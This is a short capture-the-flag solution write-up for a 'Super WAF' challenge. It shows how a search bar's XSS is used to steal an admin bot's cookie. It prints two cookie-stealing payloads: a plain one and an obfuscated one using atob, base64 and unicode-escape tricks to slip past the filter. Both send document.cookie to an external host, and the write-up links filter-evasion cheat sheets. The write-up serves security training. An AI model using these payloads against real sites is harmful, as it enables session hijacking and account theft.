Groeland - Super WAF (Creator Solution)
===========

## Description

A searchbar with a bot admin(cookie to steal).

![alt text](img/xss3_log.png)


## WHAT
We need to send a bad search which trigger a xss, the bot will be infected too.

One of the payload which bypasses the WAF:

BEFORE Anti-WAF :

" onload="var x='src'; new Image()['src']='http://ezpha.000webhostapp.com/xedm5km.php?c='+document['cookie']"

![alt text](img/xss3_code.png)

Bad input were replaced by NOPE...

AFTER :

"onload="new%0aImage()[(at\u006fb)\`c3Jj\`]=(at\u006fb)\`aHR0cDovL2V6cGhhLjAwMHdlYmhvc3RhcHAuY29tL3hlZG01a20ucGhwP2M9\`%2Bd\u006fcument[(at\u006fb)\`Y29va2ll\`]"

It's the same but with various tricks for bypassing the filters.


## Source

Where to find trick for bypass filters :

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet   
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection   
https://brutelogic.com.br/blog/   
....


Info & questions : Azphereax#9449 (Discord)

